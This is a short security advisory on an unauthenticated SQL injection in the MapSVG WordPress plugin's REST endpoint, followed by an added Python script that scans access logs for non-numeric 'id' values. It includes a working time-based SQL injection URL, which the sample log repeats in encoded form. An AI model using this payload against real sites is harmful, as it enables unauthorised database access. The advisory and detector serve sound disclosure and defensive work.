The plugin does not validate and escape a parameter received through a REST endpoint before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
https://example.com/wp-json/mapsvg/v1/maps/2?id=1' AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)--+
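For reviewing web server logs for requests of this shape, the following added example (not part of the original advisory or the plugin's code) flags any request to the MapSVG REST routes whose `id` query parameter is not a plain integer. It assumes a combined-format access log and that a legitimate `id` is numeric; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Route prefix taken from the proof-of-concept URL in this advisory.
ROUTE_PREFIX = "/wp-json/mapsvg/v1/"
# Assumption: a legitimate `id` is a short, plain non-negative integer.
VALID_ID = re.compile(r"\d{1,10}")
# Client IP and request target from a combined-format access log entry.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_requests(log_lines):
    """Return (ip, decoded id) for each request to the MapSVG REST routes
    whose `id` parameter is anything other than a plain integer."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable access-log entry
        url = urlsplit(m.group("target"))
        if not url.path.startswith(ROUTE_PREFIX):
            continue  # other routes are out of scope for this check
        # parse_qs percent-decodes values and turns '+' into a space,
        # so encoded quotes and spaces are compared in decoded form.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("id", []):
            if not VALID_ID.fullmatch(value):
                hits.append((m.group("ip"), value))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /wp-json/mapsvg/v1/maps/2?id=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20(SELECT%2042%20FROM%20'
    '(SELECT(SLEEP(5)))b)--+ HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /wp-json/wp/v2/posts?id=abc HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent non-numeric id: {value!r}")
```

Matching on an integer allowlist rather than on SQL keywords means the check does not depend on how a payload is written or encoded.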